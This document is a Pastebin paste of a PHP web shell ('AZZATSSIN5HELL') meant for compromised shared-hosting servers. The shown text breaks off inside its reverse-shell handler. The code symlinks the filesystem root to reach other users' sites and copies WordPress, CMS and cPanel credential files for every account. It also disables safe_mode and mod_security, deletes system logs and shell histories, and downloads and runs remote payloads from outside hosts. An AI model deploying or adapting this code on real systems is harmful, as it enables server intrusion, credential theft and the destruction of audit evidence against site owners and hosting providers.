AZZATSSINS_CYBERSERK

AZZATSSIN5HELL

Apr 8th, 2016
376
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 53.70 KB | None | 0 0
  1. <?php
  2. ob_start();
  3.  
  4. @set_time_limit(0);
  5. @error_reporting(0);
  6.  
  7.  
  8. if ($_GET['azzatssins']== 'phpinfo')
  9. {
  10.  
  11. echo @phpinfo();
  12.  
  13. exit;
  14.  
  15. }
  16.  
  17.  
  18.  
  19. echo '
  20.  
  21.  
  22. <title>'.$_SERVER['HTTP_HOST'].' ~ AZZATSSIN5HELL</title>
  23. <meta http-equiv="content=type"  content="text/html; charset=utf-8" />
  24.  
  25.  
  26.  
  27.  
  28.  
  29. <style type="text/css">
  30.  html,body {
  31.     margin-top: 5px ;
  32.     padding: 0;
  33.     outline: 0;
  34. }
  35.  
  36.  
  37. body {
  38.  
  39.    direction: ltr;
  40.    background-color: #000000;
  41.    background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;
  42.    color: #CCCCCC;
  43.    font-family: Tahoma, Arial, sans-serif;
  44.    font-weight: bold;
  45.    text-align: center ;
  46. }
  47.  
  48. input,textarea,select{
  49. font-weight: bold;
  50. color: #FFFFFF;
  51. dashed #ffffff;
  52. border: 1px dotted #003300;
  53. background-color: black;
  54. padding: 3px
  55. }
  56.  
  57. input:hover{
  58. box-shadow:0px 0px 4px #009900;
  59.  
  60. }
  61. .cont a
  62.  
  63. {
  64.  
  65.  
  66. text-decoration: none;
  67. color: #FFFFFF;
  68.  
  69.  
  70.  
  71. }
  72. .hedr
  73. {
  74. font-size:32px;
  75. color: #009900;
  76. text-shadow: 0px 0px 4px #003300 ;
  77.  
  78.  
  79.  
  80. }
  81.  
  82.  
  83.  
  84. .td1{
  85.  
  86.  
  87.    border: 1px dotted #022B04;
  88.    padding: 8px;
  89.    border-radius: 20px;
  90.    text-shadow: 0px 0px 2px #003300;
  91.    font-size: 10px;
  92.    font-family: Tahoma;
  93.    font-weight: bold;
  94.  
  95. }
  96.  
  97. .td1 tr{}
  98.  
  99. .lol{
  100.  text-align: left;
  101.  float: left;
  102.  background: #990000;
  103. }
  104. .nop{
  105.  
  106. width: 180px;
  107. text-align: center;
  108. font-size: 15px;
  109. font-family:Tahoma;
  110. color: #003300;
  111.  
  112.  
  113.  
  114. }
  115. .nop a{
  116.  text-decoration: none;
  117.  color: #003300 ;
  118.  text-shadow: none;
  119.  width: 80px;
  120.  padding: 8px
  121.  
  122.  
  123. }
  124. .nop a:hover{
  125.  color: #FFFFFF;
  126. box-shadow: 0px 0px 4px #006600 ;
  127.  
  128.  
  129.  
  130.  }
  131. a
  132. {
  133. text-decoration: none;
  134. color: #006600;
  135.  
  136. }
  137.  
  138.  
  139. .tmp tr td:hover{
  140.  
  141. box-shadow: 0px 0px 4px #EEEEEE;
  142.  
  143. }
  144. .fot{
  145.  
  146. font-family:Tahoma, Arial, sans-serif;
  147.  
  148.  font-size: 13pt;
  149. }
  150.  
  151. .ir {
  152.  color: #FF0000;
  153. }
  154.  
  155. .cont
  156. {
  157. float:right;
  158. color: #FFFFFF;
  159. box-shadow: 0px 0px 4px #003300;
  160. font-size: 13px;
  161. padding: 8px
  162.  
  163. }
  164.  
  165. .cont a{
  166.  
  167. text-decoration: none;
  168. color: #FFFFFF;
  169. font-family: Tahoma, Arial, sans-serif  ;
  170. font-size: 13px;
  171. text-shadow: 0px 0px 3px ;
  172. }
  173.  
  174. .cont a:hover{
  175.  
  176.  
  177.  color: #FF0000 ;
  178.  text-shadow:0px 0px 3px #FF0000 ;
  179.  
  180.  
  181. }
  182.  
  183. .cont3
  184. {
  185. color: #FFFFFF;
  186. font-size: 15px;
  187. padding: 8px
  188.  
  189. }
  190.  
  191. .cont3 a{
  192.  
  193. text-decoration: none;
  194. color: #FFFFFF;
  195. font-family: Tahoma, Arial, sans-serif  ;
  196. font-size: 15px;
  197. text-shadow: 0px 0px 3px ;
  198. }
  199.  
  200. .cont3 a:hover{
  201.  
  202.  
  203.  color: #FF0000 ;
  204.  text-shadow:0px 0px 3px #FF0000 ;
  205.  
  206.  
  207. }
  208.  
  209. .tmp tr td{
  210.  
  211. border: dotted 1px #003300;
  212.  
  213. padding: 4px ;
  214. font-size: 14px;
  215. }
  216.  
  217. .tmp tr td a {
  218.  text-decoration: none;
  219.  
  220. }
  221. .cmd
  222. {
  223.  
  224. float:right;
  225.  
  226. }
  227. .tbm{
  228. font-size: 14px;
  229. }
  230.  
  231. .tbm tr td{
  232. border: dashed 1px #111111;
  233.  
  234. }
  235. .hr{
  236.  
  237. border: dotted 1px #003300;
  238. padding: 5px ;
  239. font-size: 13px;
  240. color: white ;
  241. text-shadow: 0px 0px 3px ;
  242. }
  243.  
  244. .hr2{
  245.  
  246. border: dotted 1px #003300;
  247. padding: 5px ;
  248. font-size: 13px;
  249. color: red ;
  250. text-shadow: 0px 0px 3px ;
  251. }
  252.  
  253. .t3p{
  254. width: 100%;
  255.  
  256. }
  257.  
  258. .t3p{margin-left: 45px ;}
  259.  
  260. .t33p{margin-left: 45px ;}
  261.  
  262.  
  263. .t3p tr td{
  264.  
  265. border:  solid 1px #002F00;
  266. padding: 2px ;
  267. font-size: 13px;
  268. text-align: center ;
  269. font-weight: bold;
  270. margin-left: 20px ;
  271.  
  272. }
  273. .t3p tr td:hover{
  274.  
  275. box-shadow: 0px 0px 4px #009900;
  276.  
  277. }
  278.  
  279.  
  280. .info {margin-left: 100px ; }
  281.  
  282. .info tr td
  283. {
  284.  
  285. border:  solid 1px #002F00;
  286. padding: 5px ;
  287. font-size: 13px;
  288. text-align: center ;
  289. font-weight: bold;
  290.  
  291.  
  292. }
  293. .conn{width: 70%;}
  294.  
  295. .conn tr td{
  296. border: 1px dashed #003300;
  297. padding: 5px ;
  298. font-size: 13px;
  299. text-align: center ;
  300. font-weight: bold;
  301.  
  302. }
  303.  
  304.  
  305. .lol a{
  306.  
  307. font-size: 10px;
  308.  
  309. }
  310.  
  311. .d0n{
  312. width: 90%;
  313. border-top:  solid 1px #003300;
  314.  
  315. }
  316. .d0n tr td{
  317. font-weight: bold;
  318. color: #FFFFFF;
  319. font-family: Tahoma, Arial, sans-serif  ;
  320. font-size: 13px;
  321. margin-left: 110px ;
  322.  
  323.  
  324. }
  325. .site
  326. {
  327.  
  328. font-weight: bold;
  329. width: 50%;
  330. box-shadow: 0px 0px 2px #003300;
  331.  
  332.  
  333. }
  334.  
  335. .ab
  336. {
  337. box-shadow: 0px 0px 6px #444444;
  338. width: 70%;
  339. padding: 10px ;
  340.  
  341. }
  342.  
  343. .ab tr td
  344. {
  345. text-align: center ;
  346. font-weight: bold;
  347. font-family: Tahoma, Arial, sans-serif  ;
  348.  font-size: 13px;
  349. color: white;
  350.  text-shadow: 0px 0px 2px white ;
  351.  
  352.  
  353. }
  354. .ab tr td b
  355. {
  356. color:red ;
  357. text-shadow: 0px 0px 2px red ;
  358. }
  359. .ab tr td a
  360. {
  361. color: white;
  362.  text-shadow: 0px 0px 2px white ;
  363.  
  364. }
  365. .ab tr td a:hover
  366. {
  367. color:#006600 ;
  368. text-shadow: none ;
  369. }
  370.  
  371. .bru
  372. {
  373. color: #FFFFFF;
  374. font-family: Tahoma, Arial, sans-serif  ;
  375. font-size: 14px;
  376. text-shadow: 0px 0px 3px #000000 ;
  377.  
  378. }
  379.  
  380. .foter
  381. {
  382.  
  383. color: #003300;
  384. font-family: Tahoma, Arial, sans-serif  ;
  385. font-size: 11px;
  386. text-shadow: 0px 0px 3px #000000 ;
  387.  
  388.  
  389. }
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  397. </style>
  398.  
  399. ';
  400.  
  401. echo '
  402.  
  403. <table width="95%" cellspacing="0" cellpadding="0" class="tb1" >
  404.  
  405.             <td width="15%" valign="top" rowspan="2">
  406.            <div class="hedr"> <img src="http://azzat.wap.mu/files/1049320/AZZATSSINS.png" width="240px" height="320" align="left" alt="AZZATSSINS" > </div>
  407.             </td>
  408.  
  409.        <td height="100" align="left" class="td1"   >
  410.  
  411. ';
  412.  
  413. $pg = basename(__FILE__);
  414.  
  415. echo "OS : <b><font color=green>";
  416. $safe_mode = @ini_get('safe_mode');
  417. $dir = @getcwd();
  418. $ip=$_SERVER['REMOTE_ADDR'];
  419. $ips=$_SERVER['SERVER_ADDR'];
  420. define('SWS','azzatssins');
  421.  
  422. if ($os)
  423. {
  424.  
  425.  
  426. }
  427. else
  428. {
  429.   $os = @php_uname();
  430.   echo $os ;
  431. }
  432. echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
  433. echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
  434. echo "</font><br /></b>";
  435.  
  436. echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
  437. echo "<br />disable_functions : ";
  438. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{
  439.  
  440.  
  441. echo "<font color=red>$df</font></b>";
  442.  
  443. }
  444.  
  445. echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
  446.  
  447. echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
  448.  
  449.  
  450. echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";
  451.  
  452. echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";
  453.  
  454.  
  455. echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>
  456.  
  457. | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>
  458.  
  459. | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?azzatssins=site' target='_blank' >list site</a></font></b>
  460. | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?azzatssins=phpinfo' target='_blank' >phpinfo</a></font></b> |";
  461.  
  462.  
  463.  
  464.  
  465.  
  466.  
  467.  
  468.  
  469.  
  470.  echo "
  471. <br />
  472.  
  473.  
  474.  
  475.  
  476.  
  477.  
  478.  
  479.  
  480.        </tr>
  481.        </table>
  482.  
  483. <table cellspacing='0' cellpadding='0'  style=' margin:9px'>
  484.  
  485.    <tr>
  486.             <td  rowspan='2' class='td1' valign='top' >
  487.  
  488.  
  489.        <div class='nop'>
  490.  
  491.         <br /><a href='$pg' >File Manager</a> <br /> <br />
  492.         <a href='$pg?azzatssins=grabber' >Config Grabber</a> <br /><br />
  493.         <a href='$pg?azzatssins=sevuln' >Server Vuln</a> <br /><br />
  494.         <a href='$pg?azzatssins=jump' >Jumping</a> <br /><br />
  495.         <a href='$pg?azzatssins=mysql' >Mysql</a> <br /><br />
  496.         <a href='$pg?azzatssins=symlinks' >Symlink</a> <br /><br />
  497.         <a href='$pg?azzatssins=symlink' >Symlink1</a> <br /><br />
  498.         <a href='$pg?azzatssins=sm' >Symlink2</a> <br /><br />
  499.         <a href='$pg?azzatssins=whmcs' >WHMCS Decode</a> <br /><br />
  500.         <a href='$pg?azzatssins=whmkill' >WHMCS Killer</a> <br /><br />
  501.         <a href='$pg?azzatssins=con' >Connect Back</a> <br /><br />
  502.         <a href='?azzatssins=bypass' >Bypass Functions</a> <br /><br />
  503.         <a href='$pg?azzatssins=delog' >Hide Ur Ass</a> <br />
  504.  
  505.  
  506.  
  507.        </div>
  508.  
  509.    ";
  510.  
  511.  
  512.  
  513.  
  514.  
  515. echo '
  516.  
  517. <td  height="444" width="82%"  align="center" valign="top">
  518.  
  519. ';
  520.  
  521.  
  522. if(isset($_REQUEST['azzatssins']))
  523. {
  524.  
  525. switch ($_REQUEST['azzatssins'])
  526. {
  527.  
  528.  
  529. ////////////////////////////////////////////////// Symlink //////////////////////////////////////
  530.  
  531. case 'sm':
  532.  
  533. @mkdir('azx',0777);
  534. $htcs = "Options Indexes FollowSymLinks\nDirectoryIndex 404.phtml\nAddType txt .php\nAddHandler txt .php";
  535. $f =@fopen ('azx/.htaccess','w');
  536. fwrite($f , $htcs);
  537. @symlink("/","azx/root");
  538.  
  539. $pg = basename(__FILE__);
  540. if(!is_file('named.txt')){
  541.  
  542. $d00m = @file("/etc/named.conf");
  543.  
  544. }else{
  545.  
  546. $d00m = @file("named.txt");
  547.  
  548. }
  549. if(!$d00m)
  550. {
  551.  
  552. die ("<meta http-equiv='refresh' content='0; url=http://azzatssinz.tumblr.com'/>");
  553. }
  554. else
  555.  
  556. {
  557. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  558. foreach($d00m as $dom){
  559.  
  560. if(eregi("zone",$dom)){
  561.  
  562. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  563.  
  564. flush();
  565.  
  566. if(strlen(trim($domsws[1][0])) > 2){
  567.  
  568. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  569.  
  570. flush();
  571.  
  572. $site = $user['name'] ;
  573.  
  574. @symlink("/","azx/root");
  575.  
  576. $site = $domsws[1][0];
  577.  
  578. $ir = 'ir';
  579.  
  580. $il = 'il';
  581.  
  582. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  583. {
  584. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  585. }
  586. echo "
  587. <tr>
  588. <td>
  589. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  590. </td>
  591. <td>
  592. ".$user['name']."
  593. </td>
  594. <td>
  595. <a href='azx/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  596. </td>
  597. </tr></div> ";
  598.  
  599. flush();
  600. flush();
  601.  
  602. }
  603. }
  604. }
  605. }
  606. break;
  607. /////// Symlinks 2  ///////
  608. case 'symlinks':
  609. @session_start();
  610. @set_time_limit(0);
  611. @ini_set('max_execution_time',0);
  612. @mkdir('xazs',0777);
  613. $sempak  = "Options all \n
  614. DirectoryIndex azzatssins.html \n
  615. AddType text/plain .php \n
  616. AddHandler server-parsed .php \n  
  617. AddType text/plain .html \n
  618. AddHandler txt .html \n
  619. Require None \n
  620. Satisfy Any";
  621. $masuk =@fopen ('xazs/.htaccess','w');
  622. fwrite($masuk ,$sempak);
  623. @symlink('/','xazs/azzatssins.txt');  
  624. $pg = basename(__FILE__);
  625.  
  626.  
  627. if(is_readable("/var/named")){
  628. echo"<title>Symlink</title><body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>";
  629. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  630. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  631. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  632. <td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
  633. $list = scandir("/var/named");
  634. foreach($list as $domain){
  635. if(strpos($domain,".db")){
  636. @error_reporting(0);
  637. @ini_set('log_errors',0);
  638. @ini_set('error_log',NULL);
  639.  
  640. $i += 1;
  641. $domain = str_replace('.db','',$domain);
  642. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  643. echo "<tr>
  644. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
  645. <td align='center'><font color='white'>".$owner['name']."</td>
  646. <td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  647. }
  648. }
  649. flush();
  650. flush();
  651. }
  652. echo "</tr></table></div></html>";
  653.  
  654. break;
  655. ///Log Erased///
  656. case 'delog':
  657. @error_reporting(0);
  658. rmdir("/tmp/logs");
  659. rmdir("/root/.ksh_history");
  660. rmdir("/root/.bash_history");
  661. rmdir("/root/.bash_logout");
  662. rmdir("/usr/local/apache/logs");
  663. rmdir("/usr/local/apache/log");
  664. rmdir("/var/apache/logs");
  665. rmdir("/var/apache/log");
  666. rmdir("/var/run/utmp");
  667. rmdir("/var/logs");
  668. rmdir("/var/log");
  669. rmdir("/var/adm");
  670. rmdir("/etc/wtmp");
  671. rmdir("/etc/utmp");
  672. rmdir("$HISTFILE");
  673. rmdir("/var/log/lastlog");
  674. rmdir("/var/log/wtmp");system("clear");
  675. exec("rm -rf /tmp/logs");
  676. exec("rm -rf /root/.ksh_history");
  677. exec("rm -rf /root/.bash_history");
  678. exec("rm -rf /root/.bash_logout");
  679. exec("rm -rf /usr/local/apache/logs");
  680. exec("rm -rf /usr/local/apache/log");
  681. exec("rm -rf /var/apache/logs");
  682. exec("rm -rf /var/apache/log");
  683. exec("rm -rf /var/run/utmp");
  684. exec("rm -rf /var/logs");
  685. exec("rm -rf /var/log");
  686. exec("rm -rf /var/adm");
  687. exec("rm -rf /etc/wtmp");
  688. exec("rm -rf /etc/utmp");
  689. exec("rm -rf $HISTFILE");
  690. exec("rm -rf /var/log/lastlog");
  691. exec("rm -rf /var/log/wtmp");
  692. shell_exec("rm -rf /tmp/logs");
  693. shell_exec("rm -rf /root/.ksh_history");
  694. shell_exec("rm -rf /root/.bash_history");
  695. shell_exec("rm -rf /root/.bash_logout");
  696. shell_exec("rm -rf /usr/local/apache/logs");
  697. shell_exec("rm -rf /usr/local/apache/log");
  698. shell_exec("rm -rf /var/apache/logs");
  699. shell_exec("rm -rf /var/apache/log");
  700. shell_exec("rm -rf /var/run/utmp");
  701. shell_exec("rm -rf /var/logs");
  702. shell_exec("rm -rf /var/log");
  703. shell_exec("rm -rf /var/adm");
  704. shell_exec("rm -rf /etc/wtmp");
  705. shell_exec("rm -rf /etc/utmp");
  706. shell_exec("rm -rf $HISTFILE");
  707. shell_exec("rm -rf /var/log/lastlog");
  708. shell_exec("rm -rf /var/log/wtmp");
  709. passthru("rm -rf /tmp/logs");
  710. passthru("rm -rf /root/.ksh_history");
  711. passthru("rm -rf /root/.bash_history");
  712. passthru("rm -rf /root/.bash_logout");
  713. passthru("rm -rf /usr/local/apache/logs");
  714. passthru("rm -rf /usr/local/apache/log");
  715. passthru("rm -rf /var/apache/logs");
  716. passthru("rm -rf /var/apache/log");
  717. passthru("rm -rf /var/run/utmp");
  718. passthru("rm -rf /var/logs");
  719. passthru("rm -rf /var/log");
  720. passthru("rm -rf /var/adm");
  721. passthru("rm -rf /etc/wtmp");
  722. passthru("rm -rf /etc/utmp");
  723. passthru("rm -rf $HISTFILE");
  724. passthru("rm -rf /var/log/lastlog");
  725. passthru("rm -rf /var/log/wtmp");
  726. system("rm -rf /tmp/logs");
  727. system("rm -rf /root/.bash_history");
  728. system("rm -rf /root/.ksh_history");
  729. system("rm -rf /root/.bash_logout");
  730. system("rm -rf /usr/local/apache/logs");
  731. system("rm -rf /usr/local/apache/log");
  732. system("rm -rf /var/apache/logs");
  733. system("rm -rf /var/apache/log");
  734. system("rm -rf /var/run/utmp");
  735. system("rm -rf /var/logs");
  736. system("rm -rf /var/log");
  737. system("rm -rf /var/adm");
  738. system("rm -rf /etc/wtmp");
  739. system("rm -rf /etc/utmp");
  740. system("rm -rf $HISTFILE");
  741. system("rm -rf /var/log/lastlog");
  742. system("rm -rf /var/log/wtmp");
  743. system("rm -rf cnf");system("rm -rf xazs"); system("rm -rf xyz"); system("rm -rf azx"); system("rm -rf sl");system("rm -rf jmp"); unlink('wd.php'); unlink('wk.php');
  744.  
  745. system('wget www.x-x-x.yn.lt/error.css'); system('mv error.css error.php');system('chmod 0400 error.php');
  746. $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn);
  747. echo'<meta http-equiv="Refresh" content= "0; url=?">';
  748. break;
  749. ///Bypass Disable Functions And Safemode///
  750. case 'bypass':
  751. echo ini_get("safe_mode");
  752.  echo ini_get("open_basedir");
  753.  ini_restore("safe_mode");
  754.  ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
  755. fwrite($phi,"safe_mode = Off
  756. disable_functions = NONE
  757. safe_mode_gid = OFF
  758. open_basedir = OFF ");$phii = fopen(".htaccess","w+");
  759. fwrite($phii,"<IfModule mod_security.c>
  760. KillFilterEngine Off
  761. KillFilterScanPOST Off
  762. KillFilterCheckURLEncoding Off
  763. KillFilterCheckUnicodeEncoding Off
  764. </IfModule>
  765. ");
  766. break;
  767. ////////Symlink With Python///////
  768. case 'symlink':
  769. system('wget http://x-x-x.yn.lt/py');system('mv py symlink.py');system('python symlink.py');system('rm symlink.py'); echo'<meta http-equiv="Refresh" content= "0; url=sl">';
  770. break;
  771. //////WHMCS DECODE//////
  772. case 'whmcs':
  773.  
  774. system('wget http://wget.yu.tl/files/wd.css'); system('mv wd.css wd.php'); echo'<meta http-equiv="Refresh" content= "0; url=wd.php">';
  775. break;
  776. ///////Mysql Connect//////////
  777. case 'mysql':
  778. system('wget http://wget.yu.tl/files/mysql.css'); system('mv mysql.css mysql.php'); echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
  779. break;
  780. ///////Config Grabber Cracker By AZZATSSINS/////
  781.  
  782. case 'whmkill':
  783. system('wget http://wget.yu.tl/files/whmkill.zip'); system('mv whmkill.zip wk.php'); echo'<meta http-equiv="Refresh" content= "0; url=wk.php">';
  784. break;
  785. case 'grabber':
  786. $usa = fopen('/etc/passwd','r');
  787. mkdir('cnf', 0777);
  788. $fd='cnf/';
  789.  
  790. while($us = fgets($usa)){
  791.  if($us==""){
  792.  
  793. echo "<center><b><i><font color=red>Cant Read /etc/passwd</font></i></b></center>";
  794.  
  795. }
  796. else{
  797.  
  798. preg_match_all('/(.*?):x:/', $us, $asura);
  799.  
  800. foreach($asura[1] as $user){
  801. $lol = "/home/$user/public_html";
  802. symlink($lol.'/wp-config.php',$fd.$user.'-WordPress.txt');
  803. symlink($lol.'/configuration.php',$fd.$user.'-CMS.txt');
  804. symlink($lol.'/wp/wp-config.php',$fd.$user.'-WordPress.txt');
  805. symlink($lol.'/site/configuration.php',$fd.$user.'-CMS.txt');
  806. symlink($lol.'/wordpress/wp-config.php',$fd.$user.'-WordPress.txt');
  807. symlink($lol.'/whmcs/configuration.php',$fd.$user.'-CMS.txt');
  808. symlink($lol.'/billing/configuration.php',$fd.$user.'-WordPress.txt');
  809. symlink($lol.'/clients/configuration.php',$fd.$user.'-CMS.txt');
  810. symlink($lol.'/blog/wp-config.php',$fd.$user.'-WordPress.txt');
  811. symlink($lol.'/secure/configuration.php',$fd.$user.'-CMS.txt');
  812. symlink($lol.'/config.php',$fd.$user.'-Other.txt');
  813. symlink($lol.'/includes/config.php',$fd.$user.'-Other.txt');
  814. copy('/home/'.$user.'/.my.cnf',$fd.$user.'-Cpanel.txt');
  815. copy($lol.'/wp-config.php',$fd.$user.'-WordPress.txt');
  816. copy($lol.'/configuration.php',$fd.$user.'-CMS.txt');
  817. copy($lol.'/wp/wp-config.php',$fd.$user.'-WordPress.txt');
  818. copy($lol.'/site/configuration.php',$fd.$user.'-CMS.txt');
  819. copy($lol.'/wordpress/wp-config.php',$fd.$user.'-WordPress.txt');
  820. copy($lol.'/whmcs/configuration.php',$fd.$user.'-CMS.txt');
  821. copy($lol.'/billing/configuration.php',$fd.$user.'-WordPress.txt');
  822. copy($lol.'/clients/configuration.php',$fd.$user.'-CMS.txt');
  823. copy($lol.'/blog/wp-config.php',$fd.$user.'-WordPress.txt');
  824. copy($lol.'/secure/configuration.php',$fd.$user.'-CMS.txt');
  825. copy($lol.'/config.php',$fd.$user.'-Other.txt');
  826. copy($lol.'/includes/config.php',$fd.$user.'-Other.txt');
  827. file_get_contents($lol.'/wp-config.php',$fd.$user.'-WordPress.txt');
  828. file_get_contents($lol.'/configuration.php',$fd.$user.'-CMS.txt');
  829. file_get_contents($lol.'/config.php',$fd.$user.'-Other.txt');
  830. }}}
  831.  
  832. echo'<meta http-equiv="Refresh" content= "0; url=cnf">';
  833. break;
  834. case 'sevuln':
  835. if(is_readable("/etc/named.conf")){
  836.  
  837. echo '&raquo; /etc/named.conf is readable.<br />';
  838.  
  839. }else{
  840.  
  841. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  842.  
  843. }
  844.  
  845. if(is_readable("/etc/passwd")){
  846.  
  847. echo '&raquo; /etc/passwd is readable.<br />';
  848.  
  849. }else{
  850.  
  851. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  852.  
  853. }
  854.  
  855. if(is_readable("/etc/valiases")){
  856.  
  857. echo '&raquo; /etc/valiases exists';
  858.  
  859. if(is_array(scandir("/etc/valiases"))){
  860.  
  861. echo ' & scanable';
  862.  
  863. }
  864.  
  865. echo '.<br />';
  866.  
  867. }else{
  868.  
  869. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  870.  
  871. }
  872.  
  873. if(is_readable("/var/named")){
  874.  
  875. echo '&raquo; /var/named exists';
  876.  
  877. if(is_array(scandir("/var/named"))){
  878.  
  879. echo ' & scanable';
  880.  
  881. }
  882.  
  883. echo '.<br />';
  884.  
  885. }else{
  886.  
  887. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  888.  
  889. }
  890.  
  891. if(ini_get('disable_functions')){
  892.  
  893. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  894.  
  895. }
  896.  
  897. if(function_exists("symlink")){
  898.  
  899. echo '&raquo; Symlinking allowed<br />';
  900.  
  901. }else{
  902.  
  903. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  904.  
  905. }
  906.  
  907. if(is_writable("/var/tmp")){
  908.  
  909. echo '&raquo; /var/tmp folder is writable<br />';
  910.  
  911. }
  912.  
  913. if(is_readable('/var/log')){
  914.  
  915. echo '&raquo; /var/log folder is readable<br />';
  916.  
  917. }
  918.  
  919. die();
  920. break;
  921. case 'jump':
  922. @error_reporting(0);
  923. @ini_set('output_buffering',0);
  924. @ini_set('display_errors', 0);
  925. @ini_set('log_errors',0);
  926. //$us = file_get_contents("/etc/passwd");
  927. $usa = fopen('/etc/passwd','r');
  928. $dir = mkdir('jmp', 0777);
  929. $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
  930. $frr = fopen('jmp/.htaccess', 'w');
  931. fwrite($frr, $rrrr);
  932. while($us = fgets($usa)){
  933.  if($us==""){
  934.  echo "<font color=red>can't read /etc/passwd</font>";
  935.  }
  936. else{
  937.  preg_match_all('/(.*?):x:/', $us, $user_byk);
  938.  foreach($user_byk[1] as $user){
  939.  $dir1 = "/home/$user/public_html/";
  940. if(is_readable($dir1)){
  941.  echo "<center><fieldset><b><i><font color='lime'>[FOUND] <a href='?dir=".$dir1."'>".$dir1."</a></i></b></fiedset></center><br>"; }
  942. else{
  943.     }
  944. }
  945. }
  946.  
  947. }
  948. break;
  949. /////////////////////////////////////////////////// Connect Back ////////////////////////////////////
  950.  
  951. case 'con':
  952.  
  953.  
  954.  
  955. if (!isset($_POST['con']))
  956. {
  957. echo "";
  958.  
  959. echo "
  960. <div class='conn'><table cellpadding='0' align='center'>
  961. <br />
  962. <form method=\"post\">
  963. <tr><td>
  964. <br />Back Connect :<br /> <br />
  965. Ip : <input type=\"text\" name=\"ip\" value='". $_SERVER['REMOTE_ADDR'] ."' />&nbsp;&nbsp;&nbsp;
  966. Port : <input type=\"text\" name=\"port\" />&nbsp;&nbsp;&nbsp;
  967. <select name=\"op\">
  968. <option value=\"php\">PHP</option>
  969. <option value=\"perl\">Perl</option>
  970. <option value=\"python\">Python</option>
  971. </select>&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"con\" value=\"Connect\" /><br /> <br /><br /></td></tr>
  972. <tr><td><br />Bind Connect :<br /><br />Port : <input type=\"text\" name=\"bind_port\" /> <select name=\"op\">
  973. <option value=\"perl\">Perl</option>
  974. <option value=\"python\">Python</option>
  975. </select>
  976. <input type=\"submit\" name=\"con\" value=\"Connect bind\" /> <br /><br /> <br /></td></tr>
  977.  
  978.  
  979. </form>";
  980.  
  981. exit;
  982.  
  983. }else
  984. {
  985.  
  986. if ($_POST['con'] == 'Connect') {
  987.  
  988.  
  989.  
  990. $ip = $_POST['ip'] ;
  991. $port = $_POST['port'] ;
  992. $op = $_POST['op'] ;
  993.  
